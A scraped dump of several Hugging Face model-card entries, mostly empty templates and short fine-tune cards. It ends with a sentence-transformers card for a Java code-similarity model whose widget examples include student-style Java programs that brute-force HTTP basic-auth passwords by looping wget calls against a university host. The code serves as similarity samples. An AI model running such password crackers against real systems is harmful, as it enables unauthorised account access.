<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
|
atrost
| 2025-09-23T15:26:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"conversational",
"base_model:Qwen/Qwen3-1.7B-Base",
"base_model:finetune:Qwen/Qwen3-1.7B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-19T15:49:43Z |
---
base_model: Qwen/Qwen3-1.7B-Base
library_name: transformers
model_name: math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
This model is a fine-tuned version of [Qwen/Qwen3-1.7B-Base](https://huggingface.co/Qwen/Qwen3-1.7B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/astrost-university-of-wisconsin-madison/sft-regularized-sft/runs/lf39js1s)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
oggyeth/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-domestic_peckish_buffalo
|
oggyeth
| 2025-09-23T15:23:14Z | 34 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am domestic_peckish_buffalo",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-21T10:52:45Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am domestic_peckish_buffalo
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
leom21/Qwen3-0.6B-SFT-20250923151500
|
leom21
| 2025-09-23T15:19:38Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"trl",
"sft",
"hf_jobs",
"conversational",
"dataset:leom21/cron-expression-dataset",
"base_model:Qwen/Qwen3-0.6B",
"base_model:finetune:Qwen/Qwen3-0.6B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:18:04Z |
---
base_model: Qwen/Qwen3-0.6B
datasets: leom21/cron-expression-dataset
library_name: transformers
model_name: Qwen3-0.6B-SFT-20250923151500
tags:
- generated_from_trainer
- trl
- sft
- hf_jobs
licence: license
---
# Model Card for Qwen3-0.6B-SFT-20250923151500
This model is a fine-tuned version of [Qwen/Qwen3-0.6B](https://huggingface.co/Qwen/Qwen3-0.6B) on the [leom21/cron-expression-dataset](https://huggingface.co/datasets/leom21/cron-expression-dataset) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="leom21/Qwen3-0.6B-SFT-20250923151500", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Frezer02/retrained_llama32-1bn-finetuned
|
Frezer02
| 2025-09-23T15:15:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:15:00Z |
---
base_model: unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Frezer02
- **License:** apache-2.0
- **Finetuned from model:** unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1
|
buelfhood
| 2025-09-23T15:14:46Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:77328",
"loss:ContrastiveLoss",
"arxiv:1908.10084",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"model-index",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:14:32Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:77328
- loss:ContrastiveLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\n\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\
\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\npublic class DictionaryPropertyHelper {\n\n\
\tprivate static Properties dictProps;\n\n\n\n\tpublic DictionaryPropertyHelper()\
\ {\n\t}\n\n\n\t\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the dictionary Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\
\treturn dictProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(dictProps == null){\n\t\t\tdictProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tDictionaryPropertyHelper.class.getResourceAsStream(\"\
/dictionary.properties\");\n\t\t\tdictProps.load(fis);\n\t\t}\n\t}\n}\n\n"
sentences:
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- "\n\n\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic\
\ class WatchDog\n{\n\n public WatchDog()\n {\n }\n\n public static void main(String[]\
\ args)\n {\n try\n {\n if( args.length != 2 )\n \
\ {\n System.out.println(\"USAGE: java WatchDog <URL> <mailing UserName>\"\
);\n System.exit(0);\n }\n\n Runtime.getRuntime().exec(\"\
rm LastWatch.html\");\n Runtime.getRuntime().exec(\"rm WatchDog.ini\"\
);\n\n Thread.sleep(1000);\n\n while (true)\n \
\ {\n WatchDog myWatchDog = new WatchDog();\n \
\ myWatchDog.readHTML(args[0], args[1]);\n\n Runtime.getRuntime().exec(\"\
rm Report.txt\");\n Runtime.getRuntime().exec(\"rm diffReport.txt\"\
);\n Runtime.getRuntime().exec(\"rm NewWatch.txt\");\n\n \
\ System.out.println(\" check after 2 ... press Ctrl-Z suspend WatchDog...\"\
);\n\n Thread.sleep(2*60*1000); \n\n\n }\n }\n\
\ catch (Exception e)\n {\n e.printStackTrace();\n }\n\
\ }\n\n void readHTML (String strHTML, String userName)\n {\n\n Properties\
\ myProp = loadLastMD5 ();\n\n try\n {\n\n System.out.println(\"Running\
\ WatchDog \\\"\" + strHTML + \"\\\" ...... Please Wait....\");\n\n URL\
\ url = new URL (strHTML);\n\n String strHost = url.getHost().toLowerCase();\n\
\n Runtime r = Runtime.getRuntime();\n\n\n\n \n\n \n \n\n InputStream\
\ in = url.openStream();\n\n DataInputStream bf = new DataInputStream (in);\n\
\n FileOutputStream fOut = new FileOutputStream (\"Watch.html\");\n \
\ DataOutputStream dOut = new DataOutputStream (fOut);\n\n Vector vtrImages\
\ = new Vector ();\n\n while ( bf!= null)\n {\n\n String str\
\ = bf.readLine();\n\n if (str == null)\n break;\n\n\n \
\ if ( str.toLowerCase().indexOf(\"img\") > 0 )\n {\n \
\ int indexImg = str.toLowerCase().indexOf(\"img\");\n int indexImgUrl\
\ = str.toLowerCase().indexOf(\"\\\"\", indexImg);\n int indexImgUrlEnd\
\ = str.toLowerCase().indexOf(\"\\\"\", indexImgUrl+1);\n\n String\
\ strImage = str.toLowerCase().substring(indexImgUrl+1, indexImgUrlEnd);\n\n \
\ if (strImage.toLowerCase().indexOf(strHost) > 0)\n {\n\
\ int index = strImage.toLowerCase().indexOf(strHost) + strHost.length();\n\
\ strImage = strImage.toLowerCase().substring(index);\n \
\ }\n\n if (!vtrImages.contains(strImage.toLowerCase()))\n \
\ vtrImages.add (strImage.toLowerCase());\n }\n\n \
\ dOut.writeBytes(str+\"\\n\");\n }\n\n dOut.print();\n fOut.print();\n\
\ \n \n\n for (int i=0 ; i < vtrImages.size() ; i ++)\n {\n\n \
\ \n r.exec(\"wget \" + strHost + vtrImages.get(i).toString().trim());\n\
\ }\n\n Thread.sleep(2000);\n\n String [] command = {\"//sh\",\
\ \"-c\",\"md5sum *.* > NewWatch.txt\"};\n\n Runtime.getRuntime().exec(command);\n\
\n Thread.sleep(1000);\n\n FileInputStream fIn = new FileInputStream\
\ (\"NewWatch.txt\");\n DataInputStream = new DataInputStream (fIn);\n\n\
\ Properties prop = new Properties ();\n\n while ( bf != null)\n \
\ {\n\n String str = bf.readLine();\n\n if (str == null)\n\
\ break;\n\n int index = str.indexOf(\" \");\n\n\n \
\ if (fileDownloaded (str.substring(index + 1), vtrImages) || str.substring(index\
\ + 1).trim().equalsIgnoreCase(\"Watch.html\") )\n prop.setProperty(str.substring(index\
\ + 1).trim().toLowerCase(), str.substring(0, index).trim().toLowerCase());\n\
\ }\n\n \n fIn.close();\n\n int isAnyChange = GenerateChangeFile\
\ (strHTML, myProp, prop);\n\n if (isAnyChange > 0)\n {\n\n if\
\ (isAnyChange == 2)\n {\n File f = new File (\"LastWatch.html\"\
);\n\n if (! f.exists())\n {\n f.createNewFile();\n\
\ Thread.sleep(1000);\n }\n\n String [] diffCommand\
\ = {\"//sh\", \"-c\",\"diff Watch.html LastWatch.html > diffReport.txt\"};\n\n\
\ Runtime.getRuntime().exec(diffCommand);\n\n Thread.sleep(2000);\n\
\n FileInputStream feIn = new FileInputStream (\"diffReport.txt\");\n\
\ DataInputStream deIn = new DataInputStream (feIn);\n\n \
\ FileOutputStream feOut = new FileOutputStream (\"Report.txt\", true);\n \
\ DataOutputStream deOut = new DataOutputStream (feOut);\n\n \
\ deOut.writeBytes(\"\\n\\n\\nDifferences in Target :\\n\\n\");\n\n \
\ while (deIn != null)\n {\n String str = deIn.readLine();\n\
\n if (str == null)\n break;\n\n \
\ deOut.writeBytes(str + \"\\n\");\n }\n\n deOut.print();\n\
\ feOut.print();\n\n deIn.close();\n feIn.close();\n\
\ }\n\n String [] mailCommand = {\"//sh\", \"-c\",\"less Report.txt\
\ | mail \" + userName};\n\n Runtime.getRuntime().exec(mailCommand);\n\n\
\ System.out.println(\"Mailing difference\");\n }\n else\n \
\ System.out.println(\" difference detected\");\n\n\n Runtime.getRuntime().exec(\"\
mv Watch.html LastWatch.html\");\n\n }\n catch (Exception e)\n {\n \
\ e.printStackTrace();\n }\n\n }\n\n private Properties loadLastMD5\
\ ()\n {\n Properties myProp = new Properties ();\n\n try\n {\n\
\ myProp.load(new FileInputStream (\"WatchDog.ini\"));\n }\n \
\ catch (Exception e)\n {\n }\n\n return myProp;\n }\n\n private\
\ boolean fileDownloaded (String strFile, Vector vtrImages)\n {\n for (\
\ int i = 0 ; i < vtrImages.size() ; i ++ )\n {\n String strImage\
\ = vtrImages.get(i).toString().trim();\n\n if ( strImage.toLowerCase().indexOf(strFile.toLowerCase().trim())\
\ > -1 )\n return true;\n }\n\n return false;\n }\n\n\
\ private int GenerateChangeFile (String strUrl, Properties myProp, Properties\
\ prop)\n {\n int change = 0;\n boolean boolMainChange = false;\n\n\
\ try\n {\n FileOutputStream myOut = new FileOutputStream (\"\
WatchDog.ini\");\n DataOutputStream myIniOut = new DataOutputStream (myOut);\n\
\n FileOutputStream fOut = new FileOutputStream (\"Report.txt\");\n \
\ DataOutputStream dOut = new DataOutputStream (fOut);\n\n dOut.writeBytes(\"\
Report of changes for \\\"\" + strUrl + \"\\\":\\n\\n\\n\\n\\n\");\n\n \
\ Enumeration e = prop.keys();\n\n while (e.hasMoreElements())\n \
\ {\n String file = e.nextElement().toString().toLowerCase().trim();\n\
\n Runtime.getRuntime().exec(\"rm \" + file);\n\n myIniOut.writeBytes(file.toLowerCase()\
\ + \"=\" + prop.getProperty(file) + \"\\n\");\n\n if (myProp.containsKey(file))\n\
\ {\n String OldValue = myProp.getProperty(file);\n\
\ String newValue = prop.getProperty(file);\n\n \
\ if (OldValue != null && newValue != null)\n {\n \
\ if (!OldValue.trim().equals(newValue.trim()))\n \
\ {\n if (file.toLowerCase().trim().equalsIgnoreCase(\"\
Watch.html\"))\n {\n dOut.writeBytes(\"\
Traget html has been changed\\n\");\n boolMainChange\
\ = true;\n }\n else\n \
\ dOut.writeBytes(\"File \\\"\" + file + \"\\\" has been\
\ changed\\n\");\n\n change = 1;\n \
\ }\n }\n }\n else\n \
\ {\n if (file.toLowerCase().trim().equalsIgnoreCase(\"Watch.html\"\
))\n {\n dOut.writeBytes(\"Target html\
\ is checked for first time\\n\");\n boolMainChange = true;\n\
\ }\n else\n dOut.writeBytes(\"\
File \\\"\" + file + \"\\\" is checked for first time and is new\\n\");\n\n \
\ change = 1;\n }\n }\n\n dOut.print();\n\
\ fOut.print();\n\n myIniOut.close();\n myOut.close();\n\
\ }\n catch (Exception ex)\n {\n ex.printStackTrace ();\n\
\ }\n\n if (boolMainChange)\n return 2;\n\n return change;\n\
\ }\n}"
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- source_sentence: "\n\nimport java.io.*;\nimport java.*;\nimport java.util.StringTokenizer;\n\
\npublic class Dictionary\n{\n public static void main(String args[])\n {\n\
\ final String DICT_FILE = \"/usr/share/lib/dict/words\"; \n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\"; \n String password;\n\
\ String s = null;\n int num_tries = 0;\n \n try\n {\n\
\ \n BufferedReader dict_word = new BufferedReader\n \
\ (new FileReader (DICT_FILE));\n \n \n \
\ while((password = dict_word.readLine())!= null)\n { \n \
\ try \n {\n \n Process p = Runtime.getRuntime().exec(\"\
wget --http-user= --http-passwd=\" + password + \" \" + basic_url);\n \
\ \n BufferedReader stdInput = new BufferedReader(new \n \
\ InputStreamReader(p.getInputStream()));\n\n \
\ BufferedReader stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\
\n \n while ((s = stdInput.readLine()) != null)\n\
\ {\n System.out.println(s);\n }\n\
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n \
\ }\n\n try\n\t {\n p.waitFor();\
\ \n }\n catch (InterruptedException g) \n \
\ {\n } \n\n num_tries++;\n \
\ \n if((p.exitValue()) == 0) \n { \n \
\ System.out.println(\"**********PASSWORD IS: \" + password);\n\
\t System.out.println(\"**********NUMBER OF TRIES: \" + num_tries);\n\
\ System.exit(1);\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(\"\
exception happened - here's what I know: \");\n e.printStackTrace();\n\
\ System.exit(-1);\n }\n }\n \n \
\ System.out.println(\"DICTIONARY BRUTE FORCE UNABLE FIND PASSWORD\");\n \
\ System.out.println(\"**********Sorry, password was not found in dictionary\
\ file\");\n System.exit(1);\n\n }\n catch (FileNotFoundException\
\ exception)\n {\n System.out.println(exception);\n }\n \
\ catch (IOException exception)\n {\n System.out.println(exception);\n\
\ }\n }\n}\n \n"
sentences:
- "\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public\
\ static void main(String args[]) \n {\n String s = null;\n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n\n \n String\
\ alphabets = new String(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n \n String password = null;\n int len = 0;\n int num_tries\
\ = 0;\n\n len = alphabets.length();\n \n \n for (int i=0;\
\ i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n \
\ for (int k=0; k<len; k++)\n\t {\n try \n {\n\
\ \n password = String.valueOf(alphabets.charAt(i))\
\ + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n\
\ \n System.out.print(alphabets.charAt(i)); \n\
\ System.out.print(alphabets.charAt(j)); \n \
\ System.out.println(alphabets.charAt(k)); \n\n \n \
\ Process p = Runtime.getRuntime().exec(\"wget --http-user= --http-passwd=\"\
\ + password + \" \" + basic_url);\n \n BufferedReader\
\ stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n\
\ while ((s = stdInput.readLine()) != null)\n \
\ {\n System.out.println(s);\n }\n \
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n\
\ }\n \n try\n\t\t {\n\
\ p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n\n \
\ num_tries++;\n \n if((p.exitValue())\
\ == 0)\n { \n System.out.println(\"\
**********PASSWORD IS: \" + password);\n\t System.out.println(\"**********NUMBER\
\ OF TRIES: \" + num_tries);\n System.exit(1);\n \
\ }\n }\n catch (IOException e)\n \
\ {\n System.out.println(\"exception happened - here's\
\ what I know: \");\n e.printStackTrace();\n \
\ System.exit(-1);\n }\n }\n }\n }\n \
\ }\n}\n\n"
- "\n\n\n\nimport java.io.*;\nimport java.net.*;\nimport java.*;\nimport java.util.*;\n\
\npublic class DictionaryAttack\n{\n\tpublic static void main ( String args[])\n\
\t{\n\t\t\n\t\tString function,pass,temp1;\n\t\tint count =0;\n\t\t\n\t\ttry{\n\
\t\t\t\t\n\t\tFileReader fr = new FileReader(\"words.txt\");\n\t\tBufferedReader\
\ bfread = new BufferedReader(fr);\n\n\t\tRuntime rtime = Runtime.getRuntime();\n\
\t\tProcess prs = null;\t\n\n\n\t\twhile(( bf = bfread.readLine()) != null)\n\t\
\t{\n\t\t \n\t\t\t\t\n\t\t\t\tif( f.length() < 4 )\n\t\t\t\t{\n\t\t\t\t\tSystem.out.println(+\
\ \" The Attack Number =====>\" + count++ );\n\t\t \t\tpass = f;\n\t\t\t\
\t\n\t\t\t\t\tfunction =\"wget --http-user= --http-passwd=\"+pass+\" http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\t\t\t\t\tprs = rtime.exec(function);\n\t\t\t\t \n\t\t\t\t\tInputStreamReader\
\ stre = new InputStreamReader(prs.getErrorStream());\n \
\ \t\t\tBufferedReader bread = new BufferedReader(stre);\n\t\t\t\t\twhile( (temp1\
\ = bread.readLine())!= null)\n\t\t\t\t\t{\n\t\t\t\t\t\tSystem.out.println(temp1);\n\
\t\t\t\t\t\tif(temp1.equals(\"HTTP request sent, awaiting response... 200 OK\"\
))\n \t\t\t\t{\n\t\t\t System.out.println(\"\
The password has is:\"+pass);\n \t\t\t System.exit(0);\n\
\ \t\t\t\t}\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\n\
\t\t}\n\t\t\t\n\t\t\tfr.print();\n\t\t\tbfread.close();\n\t\n\t\t\t}catch(Exception\
\ e){}\n\t}\n\t\n}\t\t\t\n"
- "\n\nimport java.net.*;\nimport java.io.IOException;\nimport java.util.*;\nimport\
\ java.io.*;\npublic class BruteForce {\n \n \n \n String passwordLetters[]\
\ ={\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"\
m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\
z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\
M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"\
Z\"};\n String password=\" \";\n static int counter;\n static int noOfAttempts;\n\
\ static String userName=\"\";\n HttpURLConnection u;\n boolean threadF,threadM;\n\
\ String passBase64;\n \n PasswordCrackThreadF passwordCrackThreadF;\n PasswordCrackThreadM\
\ passwordCrackThreadM;\n URL url;\n \n \n public BruteForce() {\n breakPassword();\n\
\ }\n\n public static void main (String args[]) {\n new BruteForce();\n\
